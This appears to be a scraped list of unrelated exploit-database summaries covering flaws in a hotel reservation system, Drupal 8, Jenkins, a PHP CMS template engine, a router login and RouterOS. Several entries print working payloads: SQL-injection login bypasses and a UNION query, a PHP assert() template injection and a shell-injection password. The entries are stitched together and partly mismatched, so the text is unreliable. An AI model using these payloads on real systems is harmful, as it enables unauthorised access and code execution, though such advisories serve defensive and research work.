A Cross-Site Request Forgery (CSRF) vulnerability exists in Simple Online Hotel Reservation System, which allows an attacker to add an admin account without authentication. This vulnerability is due to the lack of CSRF protection in the add_account.php page, which allows an attacker to craft a malicious HTML page that can add an admin account when visited by an authenticated user. This can be exploited to gain administrative access to the application.
Go to admin login page (http://localhost/[PATH]/admin/index.php), then use below payload as username and password => Username: ' or 1 -- - Password: ' or 1 -- -. http://localhost/[PATH]/admin/edit_room.php?room_id=4 [SQLi] http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20-
This exploit is a proof-of-concept for a remote code execution vulnerability in Drupal 8.6.9 and earlier versions. It allows an unauthenticated attacker to execute arbitrary code on the target system by exploiting a vulnerability in the REST services module. Technical details for this exploit are available at https://www.drupal.org/sa-core-2019-003, https://www.ambionics.io/blog/drupal8-rce, and https://twitter.com/jcran/status/1099206271901798400.
An SQL injection vulnerability exists in News Website Script 2.0.5, which allows an attacker to inject malicious SQL queries into the application. This can be exploited to gain access to sensitive information stored in the database, such as user credentials, or to modify the data stored in the database.
An attacker can exploit this vulnerability by sending a malicious payload in the 's' parameter of the URL. For Cross Site Scripting, the payload can be a script tag with an alert function. For SQL Injection, the payload can be a SQL query that extracts the version of the database.
Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation. Login in to the admin panel, edit the template of search.html, insert the following code: {if:assert($_POST[x])}phpinfo();{end if} Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow.
This exploit chains CVE-2019-1003000 and CVE-2018-1999002 for Pre-Auth Remote Code Execution in Jenkins. It exploits Pipeline: Declarative Plugin up to and including 1.3.4, Pipeline: Groovy Plugin up to and including 2.61, and Script Security Plugin up to and including 1.49.
An attacker can exploit the Drupal 8.6.9 vulnerability by sending a serialized property through a REST request. This property will later be unserialized, which can be exploited using tools such as PHPGGC. The attacker can generate a payload using PHPGGC and send it via GET request.
The login form passes user input directly to a shell command without any kind of escaping or validation. In the file /usr/share/www/check.lp: #!/usr/bin/env cgilua.cgi <% local pass = cgilua.POST.password local com1 = os.execute("echo '"..cgilua.POST.password.."' | (su -c /bin/true)") An attacker is able to perform command injection using the "password" parameter displayed on the login form. An example "password" to bypass this authentication would be: f' > /dev/null # It is also possible for an attacker to simply execute code directly on the server.
A remote, unauthenticated attacker can proxy traffic through RouterOS via probes sent to the agent binary. This PoC demonstrates how to exploit a LAN host from the WAN.
Services By CQR